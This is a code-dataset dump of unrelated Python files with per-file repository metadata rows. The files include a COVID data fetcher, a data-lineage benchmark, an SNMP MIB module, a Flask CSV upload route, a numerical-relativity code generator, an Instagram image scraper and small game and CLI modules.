#get uk covid numbers
def get_covid() -> None:
"""Getting data from uk covid api"""
city_name = get_location()
local_only = [
'areaName={}'.format(city_name)
]
data = {
"date": "date",
"areaName": "areaName",
"newCasesByPublishDate": "newCasesByPublishDate"
}
api = Cov19API(filters = local_only, structure = data)
covid_data = api.get_json()
#store covid data in file
with open('public_health_england.json', 'w') as covid_file:
json.dump(covid_data, covid_file)
| 28.404762 | 74 | 0.602263 | 291 | 2,386 | 4.769759 | 0.316151 | 0.028818 | 0.030259 | 0.041066 | 0.262248 | 0.201729 | 0.201729 | 0.201729 | 0.201729 | 0.201729 | 0 | 0.011608 | 0.277871 | 2,386 | 83 | 75 | 28.746988 | 0.793964 | 0.126991 | 0 | 0.170213 | 0 | 0 | 0.174442 | 0.034483 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085106 | false | 0 | 0.106383 | 0 | 0.212766 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e58b7e482ceb4804189a6da6cf34ef3305149a16 | 81 | py | Python | tests/unit/system_status/formatters/__init__.py | BMeu/Orchard | cd595c9942e4e1ad0032193059f2b39fdf3bcfba | [
"MIT"
] | 2 | 2016-10-06T21:19:32.000Z | 2016-10-06T21:58:04.000Z | tests/unit/system_status/formatters/__init__.py | BMeu/Orchard | cd595c9942e4e1ad0032193059f2b39fdf3bcfba | [
"MIT"
] | 392 | 2016-10-06T17:13:30.000Z | 2021-01-15T04:15:38.000Z | tests/unit/system_status/formatters/__init__.py | BMeu/Orchard | cd595c9942e4e1ad0032193059f2b39fdf3bcfba | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Unit Test: orchard.system_status.formatters
"""
| 13.5 | 47 | 0.592593 | 9 | 81 | 5.222222 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015152 | 0.185185 | 81 | 5 | 48 | 16.2 | 0.69697 | 0.814815 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 4 |
e58ccf5e4c1a6de4e6e01e0244878e63b72d84c5 | 5,522 | py | Python | benchmark/how_lineage_benchmark.py | ZhuofanXie/DataTracer | 718f58ca87f297e7541c910a53ca8dde8ed7b66e | [
"MIT"
] | null | null | null | benchmark/how_lineage_benchmark.py | ZhuofanXie/DataTracer | 718f58ca87f297e7541c910a53ca8dde8ed7b66e | [
"MIT"
] | null | null | null | benchmark/how_lineage_benchmark.py | ZhuofanXie/DataTracer | 718f58ca87f297e7541c910a53ca8dde8ed7b66e | [
"MIT"
] | null | null | null | import time
from time import time
import dask
import pandas as pd
from dask.diagnostics import ProgressBar
import datatracer
def transform_single_column(tables, column_info):
aggregation = column_info['aggregation']
column_name = column_info['source_col']['col_name']
fk = column_info['row_map']
if aggregation:
transformer = eval(aggregation)
return transformer(tables, fk, column_name)
else:
return tables[column_info['source_col']['table_name']][column_name].fillna(0.0).values
def produce_target_column(tables, map_info):
transformation = map_info['transformation']
if transformation:
transformed_columns = []
for col_info in map_info['lineage_columns']:
transformed_columns.append(transform_single_column(tables, col_info))
transformer = eval(transformation)
return transformer(transformed_columns)
else:
return None
def approx_equal(num, target, add_margin, multi_margin):
if target >= 0:
return (num <= target * (1 + multi_margin) + add_margin) and (num >=
target * (1 - multi_margin) - add_margin)
else:
return (num <= target * (1 - multi_margin) + add_margin) and (num >=
target * (1 + multi_margin) - add_margin)
def approx_equal_arrays(num, target, add_margin, multi_margin):
for n, t in zip(num, target):
if not approx_equal(n, t, add_margin, multi_margin):
return False
return True
@dask.delayed
def evaluate_single_lineage(constraint, tracer, tables):
field = constraint["fields_under_consideration"][0]
related_fields = constraint["related_fields"]
y_true = set()
for related_field in related_fields:
y_true.add((related_field["table"], related_field["field"]))
try:
start = time()
ret_dict = tracer.solve(tables, target_table=field["table"], target_field=field["field"])
y_pred = {(col['source_col']['table_name'], col['source_col']['col_name'])
for col in ret_dict['lineage_columns']}
end = time()
except BaseException:
return {
"table": field["table"],
"field": field["field"],
"precision": 0,
"inference_time": 0,
"status": "ERROR",
}
if len(y_pred) == len(y_true) and \
len(y_true.intersection(y_pred)) == len(y_pred):
predicted_target = produce_target_column(tables, ret_dict)
target_column = tables[field["table"]][field["field"]].fillna(0.0).values
if approx_equal_arrays(predicted_target, target_column, 1e-8, 1e-8):
precision = 1
else:
precision = 0
else:
precision = 0
return {
"table": field["table"],
"field": field["field"],
"precision": precision,
"inference_time": end - start,
"status": "OK",
}
@dask.delayed
def how_lineage(solver, target, datasets):
"""Benchmark the how lineage solver on the target dataset.
Args:
solver: The name of the how lineage pipeline.
target: The name of the target dataset.
datases: A dictionary mapping dataset names to (metadata, tables) tuples.
Returns:
A list of dictionaries mapping metric names to values for each deived column.
"""
datasets = datasets.copy()
metadata, tables = datasets.pop(target)
if not metadata.data.get("constraints"):
return {} # Skip dataset, no constraints found.
tracer = datatracer.DataTracer(solver)
tracer.fit(datasets)
list_of_metrics = []
for constraint in metadata.data["constraints"]:
list_of_metrics.append(evaluate_single_lineage(constraint, tracer, tables))
list_of_metrics = dask.compute(list_of_metrics)[0]
return list_of_metrics
def benchmark_how_lineage(data_dir, dataset_name=None, solver="datatracer.how_lineage.basic"):
"""Benchmark the how lineage solver.
This uses leave-one-out validation and evaluates the performance of the
solver on the specified datasets.
Args:
data_dir: The directory containing the datasets.
dataset_name: The target dataset to test on. If none is provided, will test on all available datasets by default.
solver: The name of the column map pipeline.
Returns:
A DataFrame containing the benchmark resuls.
"""
datasets = datatracer.load_datasets(data_dir)
dataset_names = list(datasets.keys())
if dataset_name is not None:
if dataset_name in dataset_names:
dataset_names = [dataset_name]
else:
return None
datasets = dask.delayed(datasets)
dataset_to_metrics = {}
for dataset_name in dataset_names:
dataset_to_metrics[dataset_name] = how_lineage(
solver=solver, target=dataset_name, datasets=datasets)
rows = []
with ProgressBar():
results = dask.compute(dataset_to_metrics)[0]
for dataset_name, list_of_metrics in results.items():
for metrics in list_of_metrics:
metrics["dataset"] = dataset_name
rows.append(metrics)
df = pd.DataFrame(rows)
dataset_col = df.pop('dataset')
table_col = df.pop('table')
field_col = df.pop('field')
df.insert(0, 'field', field_col)
df.insert(0, 'table', table_col)
df.insert(0, 'dataset', dataset_col)
return df
| 33.877301 | 121 | 0.641434 | 672 | 5,522 | 5.06994 | 0.227679 | 0.032286 | 0.02671 | 0.017611 | 0.154975 | 0.127972 | 0.066921 | 0.066921 | 0.040505 | 0.040505 | 0 | 0.005854 | 0.257515 | 5,522 | 162 | 122 | 34.08642 | 0.825122 | 0.143064 | 0 | 0.155172 | 0 | 0 | 0.086788 | 0.0116 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060345 | false | 0 | 0.051724 | 0 | 0.232759 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e58deea7e4ceca8f46170fba5c491445e89261b9 | 4,606 | py | Python | pysnmp/H323-TRAP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/H323-TRAP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/H323-TRAP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module H323-TRAP-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/H323-TRAP-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 19:07:51 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
gwID, timeOccurred, reason, registrationStatus, comment, gwType, csID, port, percent, csType, gwIP, moduleID, code = mibBuilder.importSymbols("AGGREGATED-EXT-MIB", "gwID", "timeOccurred", "reason", "registrationStatus", "comment", "gwType", "csID", "port", "percent", "csType", "gwIP", "moduleID", "code")
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
TimeTicks, enterprises, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, ObjectName, Counter64, Unsigned32, snmpModules, ObjectIdentity, MibIdentifier, Gauge32, IpAddress, Counter32, NotificationType, ModuleIdentity, Bits, Integer32 = mibBuilder.importSymbols("SNMPv2-SMI", "TimeTicks", "enterprises", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ObjectName", "Counter64", "Unsigned32", "snmpModules", "ObjectIdentity", "MibIdentifier", "Gauge32", "IpAddress", "Counter32", "NotificationType", "ModuleIdentity", "Bits", "Integer32")
TestAndIncr, DisplayString, RowStatus, TruthValue, TimeStamp, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "TestAndIncr", "DisplayString", "RowStatus", "TruthValue", "TimeStamp", "TextualConvention")
lucent = MibIdentifier((1, 3, 6, 1, 4, 1, 1751))
products = MibIdentifier((1, 3, 6, 1, 4, 1, 1751, 1))
softSwitch = MibIdentifier((1, 3, 6, 1, 4, 1, 1751, 1, 1198))
h323DeviceServer = MibIdentifier((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3))
h323Traps = ModuleIdentity((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0))
if mibBuilder.loadTexts: h323Traps.setLastUpdated('240701')
if mibBuilder.loadTexts: h323Traps.setOrganization('Lucent Technologies')
h323CSConnectionStatus = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 0)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "csID"), ("AGGREGATED-EXT-MIB", "csType"), ("AGGREGATED-EXT-MIB", "registrationStatus"), ("AGGREGATED-EXT-MIB", "reason"), ("AGGREGATED-EXT-MIB", "comment"))
if mibBuilder.loadTexts: h323CSConnectionStatus.setStatus('current')
h323GatewayUtilization = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 1)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "gwID"), ("AGGREGATED-EXT-MIB", "moduleID"), ("AGGREGATED-EXT-MIB", "percent"), ("AGGREGATED-EXT-MIB", "comment"))
if mibBuilder.loadTexts: h323GatewayUtilization.setStatus('current')
h323DSError = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 2)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "reason"), ("AGGREGATED-EXT-MIB", "comment"))
if mibBuilder.loadTexts: h323DSError.setStatus('current')
h323UnreachableGateway = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 3)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "gwID"), ("AGGREGATED-EXT-MIB", "gwType"), ("AGGREGATED-EXT-MIB", "gwIP"), ("AGGREGATED-EXT-MIB", "port"), ("AGGREGATED-EXT-MIB", "comment"))
if mibBuilder.loadTexts: h323UnreachableGateway.setStatus('current')
h323CommandFailed = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 4)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "reason"), ("AGGREGATED-EXT-MIB", "comment"))
if mibBuilder.loadTexts: h323CommandFailed.setStatus('current')
mibBuilder.exportSymbols("H323-TRAP-MIB", h323CSConnectionStatus=h323CSConnectionStatus, h323UnreachableGateway=h323UnreachableGateway, h323CommandFailed=h323CommandFailed, softSwitch=softSwitch, products=products, h323Traps=h323Traps, PYSNMP_MODULE_ID=h323Traps, h323GatewayUtilization=h323GatewayUtilization, h323DSError=h323DSError, h323DeviceServer=h323DeviceServer, lucent=lucent)
| 139.575758 | 559 | 0.745766 | 507 | 4,606 | 6.771203 | 0.266272 | 0.109816 | 0.135159 | 0.011652 | 0.543548 | 0.485872 | 0.445674 | 0.420041 | 0.413341 | 0.40635 | 0 | 0.077867 | 0.079896 | 4,606 | 32 | 560 | 143.9375 | 0.732185 | 0.069475 | 0 | 0 | 0 | 0 | 0.325929 | 0.010288 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.28 | 0 | 0.28 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e58f4679796a04818a079751cf89d2d05f6670ee | 2,132 | py | Python | admin.py | dikshith/allcode | b5563f9d9f1839c50396a2d4de70aac5bceb318f | [
"MIT"
] | null | null | null | admin.py | dikshith/allcode | b5563f9d9f1839c50396a2d4de70aac5bceb318f | [
"MIT"
] | null | null | null | admin.py | dikshith/allcode | b5563f9d9f1839c50396a2d4de70aac5bceb318f | [
"MIT"
] | null | null | null | # save this as app.py
from __main__ import app, ALLOWED_EXTENSIONS, UPLOAD_FOLDER
from flask import Flask, request, jsonify, abort, render_template, Flask, flash, redirect, url_for
from werkzeug.utils import secure_filename
import os
import io
import csv
from models import *
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
def transform(text_file_contents):
return text_file_contents.replace("=", ",")
@app.route("/admin", methods=["GET", "POST"])
def admin():
if request.method == "POST":
table = request.form.get("table")
if 'csv' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['csv']
# If the user does not select a file, the browser submits an
# empty file without a filename.
if file.filename == '':
flash('No selected file')
return redirect(request.url)
if file and allowed_file(file.filename):
# import pdb; pdb.set_trace()
flash('File uploaded Successfully!')
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
# Read csv file
csv_input = csv.DictReader(open(os.path.join(app.config['UPLOAD_FOLDER'], filename)))
rel_version = release_version(6)
db.session.add(rel_version)
db.session.commit()
rel_id = rel_version.id
for row in csv_input:
print(row)
performance = performance_results(rel_id, row['Label'], int(row['# Samples']), int(row['Average']), int(row['Median']), int(row['90% Line']), int(row['95% Line']), int(row['99% Line']), int(row['Min']), int(row['Max']), float(row['Error %']), float(row['Throughput']), float(row['Received KB/sec']), float(row['Sent KB/sec']))
db.session.add(performance)
db.session.commit()
return redirect(request.url)
return render_template("admin/admin.html"), 404
| 37.403509 | 344 | 0.615385 | 271 | 2,132 | 4.730627 | 0.409594 | 0.037442 | 0.049142 | 0.056162 | 0.060842 | 0.060842 | 0.060842 | 0.060842 | 0 | 0 | 0 | 0.007477 | 0.247186 | 2,132 | 56 | 345 | 38.071429 | 0.791277 | 0.070826 | 0 | 0.128205 | 0 | 0 | 0.115949 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.179487 | 0.051282 | 0.410256 | 0.025641 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e58f86674bdf77a8b5f16bc946bf19c653623803 | 2,057 | py | Python | BSSN_SF/BSSN_ID_function_string.py | kazewong/nrpytutorial | cc511325f37f01284b2b83584beb2a452556b3fb | [
"BSD-2-Clause"
] | null | null | null | BSSN_SF/BSSN_ID_function_string.py | kazewong/nrpytutorial | cc511325f37f01284b2b83584beb2a452556b3fb | [
"BSD-2-Clause"
] | null | null | null | BSSN_SF/BSSN_ID_function_string.py | kazewong/nrpytutorial | cc511325f37f01284b2b83584beb2a452556b3fb | [
"BSD-2-Clause"
] | null | null | null | # This module sets up an initial data function meant to
# be called in a pointwise manner at all gridpoints.
# Author: Zachariah B. Etienne
# zachetie **at** gmail **dot* com
from outputC import *
def BSSN_ID_function_string(cf,hDD,lambdaU,aDD,trK,alpha,vetU,betU):
returnstring = "void BSSN_ID(REAL xx0,REAL xx1,REAL xx2,REAL Cartxyz0,REAL Cartxyz1,REAL Cartxyz2,\n"
returnstring += "\tREAL *hDD00,REAL *hDD01,REAL *hDD02,REAL *hDD11,REAL *hDD12,REAL *hDD22,\n"
returnstring += "\tREAL *aDD00,REAL *aDD01,REAL *aDD02,REAL *aDD11,REAL *aDD12,REAL *aDD22,\n"
returnstring += "\tREAL *trK,\n"
returnstring += "\tREAL *lambdaU0,REAL *lambdaU1,REAL *lambdaU2,\n"
returnstring += "\tREAL *vetU0,REAL *vetU1,REAL *vetU2,\n"
returnstring += "\tREAL *betU0,REAL *betU1,REAL *betU2,\n"
returnstring += "\tREAL *alpha,REAL *cf) {\n"
returnstring += outputC([hDD[0][0], hDD[0][1], hDD[0][2], hDD[1][1], hDD[1][2], hDD[2][2],
aDD[0][0], aDD[0][1], aDD[0][2], aDD[1][1], aDD[1][2], aDD[2][2],
trK,
lambdaU[0], lambdaU[1], lambdaU[2],
vetU[0], vetU[1], vetU[2],
betU[0], betU[1], betU[2],
alpha, cf],
["*hDD00", "*hDD01", "*hDD02", "*hDD11", "*hDD12", "*hDD22",
"*aDD00", "*aDD01", "*aDD02", "*aDD11", "*aDD12", "*aDD22",
"*trK",
"*lambdaU0", "*lambdaU1", "*lambdaU2",
"*vetU0", "*vetU1", "*vetU2",
"*betU0", "*betU1", "*betU2",
"*alpha", "*cf"], filename="returnstring",
params="preindent=1,CSE_enable=True,outCverbose=False", # outCverbose=False to prevent
# enormous output files.
prestring="", poststring="")
returnstring += "}\n"
return returnstring
| 55.594595 | 115 | 0.500243 | 229 | 2,057 | 4.471616 | 0.401747 | 0.101563 | 0.123047 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076812 | 0.32912 | 2,057 | 36 | 116 | 57.138889 | 0.665217 | 0.109869 | 0 | 0 | 0 | 0.107143 | 0.336623 | 0.024671 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.035714 | 0 | 0.107143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5919a61e375fbb9499ebd4f58ee76df900f51b5 | 8,163 | py | Python | CollectData/instagram_downloader_public.py | erik1110/face-transformation | e9afab85340522c8e19d73b08cedced187d8ada0 | [
"MIT"
] | 1 | 2020-10-04T07:39:50.000Z | 2020-10-04T07:39:50.000Z | CollectData/instagram_downloader_public.py | erik1110/face-transformation | e9afab85340522c8e19d73b08cedced187d8ada0 | [
"MIT"
] | null | null | null | CollectData/instagram_downloader_public.py | erik1110/face-transformation | e9afab85340522c8e19d73b08cedced187d8ada0 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# coding:utf-8
"""
Instagram Downloader
"""
import os
import logging
import time
import requests
from datetime import datetime
import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from bs4 import BeautifulSoup as bs
class MyApp(object):
"""
define the GUI interface
"""
def __init__(self):
self.set_log()
self.root = tk.Tk()
self.root.title("Instgram Downloader")
self.root.geometry('500x250')
self.canvas = tk.Canvas(self.root, height=400, width=700)
self.canvas.pack(side='top')
self.setup_ui()
def set_log(self):
if not os.path.exists('./screenshot'):
os.mkdir('./screenshot')
if not os.path.exists('./log'):
os.mkdir('./log')
log_name = 'log/RPA_%Y%m%d_%H%M%S.log'
logging.basicConfig(level=logging.INFO,
filename=datetime.now().strftime(log_name),
filemode='w',
format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')
self.logger = logging.getLogger(log_name)
def setup_ui(self):
"""
setup UI interface
"""
self.label_save_file = tk.Label(self.root, text='存檔資料夾:')
self.label_pattern = tk.Label(self.root, text = "選擇模式:")
self.label_id = tk.Label(self.root, text = "id or tag:")
self.label_limit = tk.Label(self.root, text='圖片上限:')
self.input_save_file = tk.Entry(self.root, width=30)
self.input_pattern = ttk.Combobox(self.root, values=["id", "tag"])
self.input_pattern.current(0)
self.input_limit = tk.Entry(self.root, width=30)
self.input_id = tk.Entry(self.root, width=30)
self.input_tag = tk.Entry(self.root, width=30)
self.login_button = tk.Button(self.root, command=self.run, text="Run", width=10, foreground = "black")
self.quit_button = tk.Button(self.root, command=self.quit, text="Quit", width=10, foreground = "black")
def gui_arrang(self):
"""
setup position of UI
"""
self.label_save_file.place(x=60, y=30)
self.label_pattern.place(x=60, y=70)
self.label_id.place(x=60, y=110)
self.label_limit.place(x=60, y=150)
self.input_save_file.place(x=130, y=30)
self.input_pattern.place(x=130, y=70)
self.input_id.place(x=130, y=110)
self.input_limit.place(x=130, y=150)
self.login_button.place(x=130, y=190)
self.quit_button.place(x=270, y=190)
def check(self):
"""
check the input of gui interface
return:
True
False
"""
# check your input
self.save_file = self.input_save_file.get()
self.pattern = self.input_pattern.get()
self.id = self.input_id.get()
if len(self.save_file) == 0 or len(self.pattern) == 0 or \
len(self.id)==0 or len(self.input_limit.get())==0:
messagebox.showinfo(title='System Alert', message='不得為空!')
self.logger.info('填選處為空值!')
return False
try:
self.limit = int(self.input_limit.get())
except:
messagebox.showinfo(title='System Alert', message='限制數應為整數!')
self.logger.info('限制數應為整數!')
return False
# check your save file
if not self.pattern in ['id','tag']:
messagebox.showinfo(title='System Alert', message=f'模式輸入有誤')
self.logger.warning('The pattern is wrong!')
return False
# check your save file
if self.save_file in ['log','screenshot']:
messagebox.showinfo(title='System Alert', message=f'該資料夾檔名不可使用!')
self.logger.warning('The file name is wrong!')
return False
if not os.path.exists(f'./{self.save_file}'):
os.mkdir(f'./{self.save_file}')
messagebox.showinfo(title='System Alert', message=f'已建立{self.save_file}的資料夾')
self.logger.info(f'Make dir:{self.save_file}')
return True
def download(self):
"""
download instagram photo
"""
# get driver
driver = webdriver.Chrome(ChromeDriverManager().install())
driver.maximize_window()
# create url
if self.pattern=='id':
user_id = self.id
elif self.pattern=='tag':
user_id = f'explore/tags/{self.id}/'
origin_url = 'https://www.instagram.com/' + user_id
driver.get(origin_url)
time.sleep(3)
SCROLL_PAUSE_TIME = 3
images_unique=[]
# Get scroll height
last_height = driver.execute_script("return document.body.scrollHeight")
while True:
# Wait to load page
time.sleep(SCROLL_PAUSE_TIME)
# Scroll down to bottom
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait
time.sleep(1)
# show more if exists
try:
button_name = f'顯示更多 {user_id} 的貼文'
show_more = driver.find_element_by_xpath(f"//*[contains(text(),'{button_name}')]")
show_more.click()
except:
pass
# Wait to load page
time.sleep(SCROLL_PAUSE_TIME)
# Calculate new scroll height and compare with last scroll height
new_height = driver.execute_script("return document.body.scrollHeight")
if new_height == last_height:
driver.execute_script("window.scrollTo(document.body.scrollHeight,0);")
break
# This means that there is still photos to scrap
last_height = new_height
time.sleep(1)
# Retrive the html
html_to_parse = str(driver.page_source)
html = bs(html_to_parse,"html5lib")
# Get the image's url
images_url = html.findAll("img", {"class": "FFVAD"})
# Check if they are unique
in_first = set(images_unique)
in_second = set(images_url)
in_second_but_not_in_first = in_second - in_first
result = images_unique + list(in_second_but_not_in_first)
images_unique = result
# if the images greater than the limit, break
if len(images_unique)>self.limit:
break
num_images = len(images_unique)
self.logger.info(f'抓到{num_images}張圖片')
#Close the webdriver
driver.close()
for i, _ in enumerate(images_unique):
try:
# Save each image.jpg file
name=f"./{self.save_file}/{self.id}"+str(i)+".jpg"
with open(name, 'wb') as handler:
img_data = requests.get(images_unique[i].get("src")).content
handler.write(img_data)
except:
self.logger.warning('無法存取:{}'.format(images_unique[i]))
def run(self):
"""
when you click the button of run, it'll execute
"""
start_time = datetime.now()
if self.check():
self.download()
messagebox.showinfo(title='System Alert', message='程式執行完畢!')
else:
self.logger.warning('檢查不通過!')
end_time = datetime.now()
execution_time = (end_time-start_time).seconds
self.logger.info('Total Execution time:', execution_time, 's')
messagebox.showinfo(title='System Alert', message=f'執行時間:{execution_time}秒')
def quit(self):
"""
when you click the button of quit, it'll execute
"""
self.root.destroy()
def main():
"""
main function for MyApp
"""
# initial
app = MyApp()
# arrage gui
app.gui_arrang()
# run tkinter
tk.mainloop()
if __name__ == '__main__':
main() | 32.521912 | 111 | 0.565356 | 1,003 | 8,163 | 4.465603 | 0.267198 | 0.028578 | 0.021433 | 0.045323 | 0.231525 | 0.192677 | 0.145791 | 0.062291 | 0.016968 | 0 | 0 | 0.016074 | 0.3141 | 8,163 | 251 | 112 | 32.521912 | 0.78389 | 0.097513 | 0 | 0.104575 | 0 | 0.006536 | 0.125822 | 0.043807 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0.006536 | 0.071895 | 0 | 0.169935 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5955e9b54c057b715c9c61eeca8482e6b1cbc74 | 474 | py | Python | src/entrypoint.py | nastjamakh/home-credit-risk | 610d5cd4ddfed4298b4119ca1a5d73609a339e6a | [
"MIT"
] | null | null | null | src/entrypoint.py | nastjamakh/home-credit-risk | 610d5cd4ddfed4298b4119ca1a5d73609a339e6a | [
"MIT"
] | null | null | null | src/entrypoint.py | nastjamakh/home-credit-risk | 610d5cd4ddfed4298b4119ca1a5d73609a339e6a | [
"MIT"
] | null | null | null | """CLI interface."""
import fire
from train import TrainingPipeline
from data.load import FileDataLoader
from modelling.estimator import HeuristicEstimator
class Entrypoint:
"""CLI entrypoint."""
def __init__(self) -> None:
self.train = TrainingPipeline()
self.data = FileDataLoader()
self.model = HeuristicEstimator()
def cli() -> None:
"""Function to start cli."""
fire.Fire(Entrypoint)
if __name__ == "__main__":
cli()
| 18.96 | 50 | 0.672996 | 49 | 474 | 6.265306 | 0.530612 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.208861 | 474 | 24 | 51 | 19.75 | 0.818667 | 0.111814 | 0 | 0 | 0 | 0 | 0.019753 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.307692 | 0 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
e59674284af4fef611fde876735095fbdeedb812 | 538 | py | Python | Working folder/refactored/Player_Ability.py | rschnek/SpaceShooterRemix | 7e667183e770679d593f46b119780ad72f4e3135 | [
"MIT"
] | null | null | null | Working folder/refactored/Player_Ability.py | rschnek/SpaceShooterRemix | 7e667183e770679d593f46b119780ad72f4e3135 | [
"MIT"
] | null | null | null | Working folder/refactored/Player_Ability.py | rschnek/SpaceShooterRemix | 7e667183e770679d593f46b119780ad72f4e3135 | [
"MIT"
] | null | null | null | import pygame
from os import path
import constants as con
class ability:
def __init__(self):
self.__power = 1
self.__power_timer = pygame.time.get_ticks()
def powerdown(self):
if pygame.time.get_ticks() - self.__power_timer > con.poweruptime:
self.__power -= 1
self.__power_timer = pygame.time.get_ticks()
def powerup(self):
self.__power += 1
